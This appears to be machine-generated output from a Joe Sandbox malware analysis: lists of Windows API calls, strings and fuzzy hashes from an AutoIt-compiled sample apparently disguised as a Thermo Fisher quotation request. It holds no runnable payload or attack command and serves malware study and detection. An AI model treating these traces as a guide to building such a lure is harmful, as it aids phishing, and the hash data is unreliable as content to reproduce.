                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0064750A
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: 05a1c77f54c7997062911eadd2489aeaba5935cd997820a323e7ccde0de286a6
                                                              • Instruction ID: 394b97c15044235bf9c8d7b27be0cdc41236fcf9c4bd153b99b49bf0dbf656a7
                                                              • Opcode Fuzzy Hash: 05a1c77f54c7997062911eadd2489aeaba5935cd997820a323e7ccde0de286a6
                                                              • Instruction Fuzzy Hash: E6D05EA016C24438EF1D03209D1BFF7064BF302784FD445497203DD1C0AED05D02A031
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0063AD3E), ref: 0063B124
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: ab9bf0833e1f4fd558e019c13e507994fff6790c994050b6a7e48eb2a33bc77e
                                                              • Instruction ID: 72b701f45cf51a9a2234e6275b2d22ef73311c99fdb8140b6bc6ac4ebf46629e
                                                              • Opcode Fuzzy Hash: ab9bf0833e1f4fd558e019c13e507994fff6790c994050b6a7e48eb2a33bc77e
                                                              • Instruction Fuzzy Hash: E2D05E320A460EBEDF024FA4EC02EAE3F6AEB04700F408110FA11C50A0C671D531AB60
                                                              APIs
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 24031d6b1888f41c693e98fced6f62cb9947d94b58fb3537fbb1f87fdb0f8191
                                                              • Instruction ID: cce53cd12cdb73e24807e3c7728b28b2338e0e7963c0e3ba12e9eae479a3bc03
                                                              • Opcode Fuzzy Hash: 24031d6b1888f41c693e98fced6f62cb9947d94b58fb3537fbb1f87fdb0f8191
                                                              • Instruction Fuzzy Hash: 1FC04CB1400109EFCB51DFC0C9449EEB7BDAB04305F1051919105F1150D7709B459B77
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0062818F
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: b5194f7aa33e3ab3459dd9615e7f7435584d9979c8c18ce3816db1a9b8b53492
                                                              • Instruction ID: 378bbfba25b982d2be52b629b3f8c226c43814844a59b4e498c0aebfb9eed808
                                                              • Opcode Fuzzy Hash: b5194f7aa33e3ab3459dd9615e7f7435584d9979c8c18ce3816db1a9b8b53492
                                                              • Instruction Fuzzy Hash: C4A0223008020CFBCF002F82FC08C883F2EFB022A0B000020F80C80030CB33A8208BE2
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d8be1465b6903429252ca78f4b058b718fe42fc2276a23131db4b9f02dd0eccb
                                                              • Instruction ID: dd8010efbe921cc18ce7350926bb4c40a057b90f22dd63efdf3c383ad43da083
                                                              • Opcode Fuzzy Hash: d8be1465b6903429252ca78f4b058b718fe42fc2276a23131db4b9f02dd0eccb
                                                              • Instruction Fuzzy Hash: 2522B174944225CFDB28DF54C480AEAB7F2FF14304F28C869D94A9B391E736AD81CB91
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d5df67e1c0b5e059b2155d50892880ed4f8ae701e059cb7344ac897134f9aff3
                                                              • Instruction ID: fc04a9f302c9578fc28750e18171dc75163a6eed71d986e9c03fc52fbe970c42
                                                              • Opcode Fuzzy Hash: d5df67e1c0b5e059b2155d50892880ed4f8ae701e059cb7344ac897134f9aff3
                                                              • Instruction Fuzzy Hash: FA127070A002099FDF48DFA5D991AEEB7F7FF48300F108569E406E7291EB36A951CB64
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3728558374-0
                                                              • Opcode ID: a7fc9e6eb9a8657ad2f4447b3a39aa8d638b8c90da9959f98175c6b4f9b9d678
                                                              • Instruction ID: 180bbd3fdf9450829a30d3a05c095e9a6df232857857a11ca55a757abc2bf8a2
                                                              • Opcode Fuzzy Hash: a7fc9e6eb9a8657ad2f4447b3a39aa8d638b8c90da9959f98175c6b4f9b9d678
                                                              • Instruction Fuzzy Hash: 1902B3B0A00206DBCF48DF64D991AAFB7F6EF44300F14C469E80ADB295EB35DA51CB95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 0065A2FE
                                                              • DeleteObject.GDI32(00000000), ref: 0065A310
                                                              • DestroyWindow.USER32 ref: 0065A31E
                                                              • GetDesktopWindow.USER32 ref: 0065A338
                                                              • GetWindowRect.USER32(00000000), ref: 0065A33F
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0065A480
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0065A490
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A4D8
                                                              • GetClientRect.USER32(00000000,?), ref: 0065A4E4
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0065A51E
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A540
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A553
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A55E
                                                              • GlobalLock.KERNEL32(00000000), ref: 0065A567
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A576
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0065A57F
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A586
                                                              • GlobalFree.KERNEL32(00000000), ref: 0065A591
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A5A3
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0068D9BC,00000000), ref: 0065A5B9
                                                              • GlobalFree.KERNEL32(00000000), ref: 0065A5C9
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0065A5EF
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0065A60E
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A630
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0065A81D
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              • API String ID: 2211948467-2373415609
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 0066D2DB
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0066D30C
                                                              • GetSysColor.USER32(0000000F), ref: 0066D318
                                                              • SetBkColor.GDI32(?,000000FF), ref: 0066D332
                                                              • SelectObject.GDI32(?,00000000), ref: 0066D341
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0066D36C
                                                              • GetSysColor.USER32(00000010), ref: 0066D374
                                                              • CreateSolidBrush.GDI32(00000000), ref: 0066D37B
                                                              • FrameRect.USER32(?,?,00000000), ref: 0066D38A
                                                              • DeleteObject.GDI32(00000000), ref: 0066D391
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0066D3DC
                                                              • FillRect.USER32(?,?,00000000), ref: 0066D40E
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0066D439
                                                                • Part of subcall function 0066D575: GetSysColor.USER32(00000012), ref: 0066D5AE
                                                                • Part of subcall function 0066D575: SetTextColor.GDI32(?,?), ref: 0066D5B2
                                                                • Part of subcall function 0066D575: GetSysColorBrush.USER32(0000000F), ref: 0066D5C8
                                                                • Part of subcall function 0066D575: GetSysColor.USER32(0000000F), ref: 0066D5D3
                                                                • Part of subcall function 0066D575: GetSysColor.USER32(00000011), ref: 0066D5F0
                                                                • Part of subcall function 0066D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0066D5FE
                                                                • Part of subcall function 0066D575: SelectObject.GDI32(?,00000000), ref: 0066D60F
                                                                • Part of subcall function 0066D575: SetBkColor.GDI32(?,00000000), ref: 0066D618
                                                                • Part of subcall function 0066D575: SelectObject.GDI32(?,?), ref: 0066D625
                                                                • Part of subcall function 0066D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0066D644
                                                                • Part of subcall function 0066D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0066D65B
                                                                • Part of subcall function 0066D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0066D670
                                                                • Part of subcall function 0066D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0066D698
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              APIs
                                                              • DestroyWindow.USER32 ref: 0061B98B
                                                              • DeleteObject.GDI32(00000000), ref: 0061B9CD
                                                              • DeleteObject.GDI32(00000000), ref: 0061B9D8
                                                              • DestroyIcon.USER32(00000000), ref: 0061B9E3
                                                              • DestroyWindow.USER32(00000000), ref: 0061B9EE
                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0067D2AA
                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0067D2E3
                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0067D711
                                                                • Part of subcall function 0061B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0061B759,?,00000000,?,?,?,?,0061B72B,00000000,?), ref: 0061BA58
                                                              • SendMessageW.USER32 ref: 0067D758
                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0067D76F
                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0067D785
                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0067D790
                                                              Similarity
                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                              • String ID: 0
                                                              • API String ID: 464785882-4108050209
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0064DBD6
                                                              • GetDriveTypeW.KERNEL32(?,0069DC54,?,\\.\,0069DC00), ref: 0064DCC3
                                                              • SetErrorMode.KERNEL32(00000000,0069DC54,?,\\.\,0069DC00), ref: 0064DE29
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              • Opcode ID: fb49d10cd9355af57e6a73924a96d8dee96bce441cd45262471e0a8a8da95021
                                                              • Instruction ID: e7da53ca9b26b7581fce7cc326de682717d75e2c09cc6e3cb8276ec7006436cd
                                                              • Opcode Fuzzy Hash: fb49d10cd9355af57e6a73924a96d8dee96bce441cd45262471e0a8a8da95021
                                                              • Instruction Fuzzy Hash: 57812B70680216BBDB68AB64DC92FFF376BAF25310F04413CF9096A2C2EB60D945C795
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0066C788
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0066C83E
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 0066C859
                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0066CB15
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: 3a99f429cd1339769d0d9ae35fa264fb68e62ac4752f8c7ba3ca3edd8dc26369
                                                              • Instruction ID: 5a4c23d7bcbaa43954f47c6b15374de99b9c4ef61c1534e9c56a3111ebca3bff
                                                              • Opcode Fuzzy Hash: 3a99f429cd1339769d0d9ae35fa264fb68e62ac4752f8c7ba3ca3edd8dc26369
                                                              • Instruction Fuzzy Hash: AAF1D171104B45AFD7218F24C889BBABBE6FF49364F08061DF5D8963A1C774D841DBA2
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,0069DC00), ref: 00666449
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 3964851224-45149045
                                                              • Opcode ID: 2ba2190981ecddabfbe2c93ec45466a474235d574055b71183fb86e1049004c6
                                                              • Instruction ID: ce2ce0470183e49c620a1af0b8d685df2d31cd92aa4e8877d3bd9c64bd519b31
                                                              • Opcode Fuzzy Hash: 2ba2190981ecddabfbe2c93ec45466a474235d574055b71183fb86e1049004c6
                                                              • Instruction Fuzzy Hash: BEC170702042468BCB44EF20D551AAE7B97AF94344F04486DF8965B3E3DF21ED8BCB86
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 0066D5AE
                                                              • SetTextColor.GDI32(?,?), ref: 0066D5B2
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0066D5C8
                                                              • GetSysColor.USER32(0000000F), ref: 0066D5D3
                                                              • CreateSolidBrush.GDI32(?), ref: 0066D5D8
                                                              • GetSysColor.USER32(00000011), ref: 0066D5F0
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0066D5FE
                                                              • SelectObject.GDI32(?,00000000), ref: 0066D60F
                                                              • SetBkColor.GDI32(?,00000000), ref: 0066D618
                                                              • SelectObject.GDI32(?,?), ref: 0066D625
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0066D644
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0066D65B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0066D670
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0066D698
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0066D6BF
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0066D6DD
                                                              • DrawFocusRect.USER32(?,?), ref: 0066D6E8
                                                              • GetSysColor.USER32(00000011), ref: 0066D6F6
                                                              • SetTextColor.GDI32(?,00000000), ref: 0066D6FE
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0066D712
                                                              • SelectObject.GDI32(?,0066D2A5), ref: 0066D729
                                                              • DeleteObject.GDI32(?), ref: 0066D734
                                                              • SelectObject.GDI32(?,?), ref: 0066D73A
                                                              • DeleteObject.GDI32(?), ref: 0066D73F
                                                              • SetTextColor.GDI32(?,?), ref: 0066D745
                                                              • SetBkColor.GDI32(?,?), ref: 0066D74F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: 67af19573410f095f92a0255d49823b640c67a80a8f97b34de9d478b00a9fcc5
                                                              • Instruction ID: 234e598a752af2ddf33a6fcfe41cee884a61b9fe522dfd388b3db6a6e263e140
                                                              • Opcode Fuzzy Hash: 67af19573410f095f92a0255d49823b640c67a80a8f97b34de9d478b00a9fcc5
                                                              • Instruction Fuzzy Hash: 66511A71900218BFDF10AFA8DC48EEE7BBAEF48324F105615F915AB2E1D7759A409F60
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0066B7B0
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0066B7C1
                                                              • CharNextW.USER32(0000014E), ref: 0066B7F0
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0066B831
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0066B847
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0066B858
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0066B875
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0066B8C7
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0066B8DD
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0066B90E
                                                              • _memset.LIBCMT ref: 0066B933
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0066B97C
                                                              • _memset.LIBCMT ref: 0066B9DB
                                                              • SendMessageW.USER32 ref: 0066BA05
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0066BA5D
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 0066BB0A
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0066BB2C
                                                              • GetMenuItemInfoW.USER32(?), ref: 0066BB76
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0066BBA3
                                                              • DrawMenuBar.USER32(?), ref: 0066BBB2
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 0066BBDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: 14184b42e999b2320b1ead7288966773ebd926bae18175dd1bd5ff5717d0d9d7
                                                              • Instruction ID: 389884f7d3ed9df16bbd2e6d2ec0de340d1dfc8c3ba4523bd3e77b430ce99fcb
                                                              • Opcode Fuzzy Hash: 14184b42e999b2320b1ead7288966773ebd926bae18175dd1bd5ff5717d0d9d7
                                                              • Instruction Fuzzy Hash: 68E18C75900218EBDB209F65CC84EEE7B7AFF45714F10925AF919EB291DB708A81CF60
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Foreground
                                                              • String ID: ACTIVE$ALL$CLASS$H+k$HANDLE$INSTANCE$L+k$LAST$P+k$REGEXPCLASS$REGEXPTITLE$T+k$TITLE
                                                              • API String ID: 62970417-3407795192
                                                              • Opcode ID: 5acde4c75eb9d5a4b13e0929d77020f38bfd7defbdeeb9fdb474be957c09d43b
                                                              • Instruction ID: 193d40bc319613b1d858132bd3be7845dd9be8b523c5611307a1d833c8c7b43f
                                                              • Opcode Fuzzy Hash: 5acde4c75eb9d5a4b13e0929d77020f38bfd7defbdeeb9fdb474be957c09d43b
                                                              • Instruction Fuzzy Hash: E3D1C8301086439BCB48EF20C8A19DABBB7BF54354F108A1DF459576A2DB30E9DACBD5
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 0066778A
                                                              • GetDesktopWindow.USER32 ref: 0066779F
                                                              • GetWindowRect.USER32(00000000), ref: 006677A6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00667808
                                                              • DestroyWindow.USER32(?), ref: 00667834
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0066785D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066787B
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006678A1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 006678B6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006678C9
                                                              • IsWindowVisible.USER32(?), ref: 006678E9
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00667904
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00667918
                                                              • GetWindowRect.USER32(?,?), ref: 00667930
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00667956
                                                              • GetMonitorInfoW.USER32 ref: 00667970
                                                              • CopyRect.USER32(?,?), ref: 00667987
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 006679F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: e674579c021cf67ea3405fe324b2b072fc43b986fffcc31501ad82b7783ddfd0
                                                              • Instruction ID: 4f32c16a822f0310c1ac5046ff71d7bd45102d7c577f437253dbc1ddb7fbc59b
                                                              • Opcode Fuzzy Hash: e674579c021cf67ea3405fe324b2b072fc43b986fffcc31501ad82b7783ddfd0
                                                              • Instruction Fuzzy Hash: 6FB1AE71608301AFDB44DF64C848B6ABBE6FF88314F008A1DF5999B291D770EC45CBA6
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00646CFB
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00646D21
                                                              • _wcscpy.LIBCMT ref: 00646D4F
                                                              • _wcscmp.LIBCMT ref: 00646D5A
                                                              • _wcscat.LIBCMT ref: 00646D70
                                                              • _wcsstr.LIBCMT ref: 00646D7B
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00646D97
                                                              • _wcscat.LIBCMT ref: 00646DE0
                                                              • _wcscat.LIBCMT ref: 00646DE7
                                                              • _wcsncpy.LIBCMT ref: 00646E12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: 20a49acb5b54f67758a62c2a8444904eed0ddc3902476247c272b5e3a81b4541
                                                              • Instruction ID: 77392964bfa4e0096c8bd7f27020e5d1e78acea797c183761e408c0e31d7ca14
                                                              • Opcode Fuzzy Hash: 20a49acb5b54f67758a62c2a8444904eed0ddc3902476247c272b5e3a81b4541
                                                              • Instruction Fuzzy Hash: BE41F871A04210BBEB40AB64DC47EFF77BFEF52710F140069F901E6182EB749A0197AA
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0061A939
                                                              • GetSystemMetrics.USER32(00000007), ref: 0061A941
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0061A96C
                                                              • GetSystemMetrics.USER32(00000008), ref: 0061A974
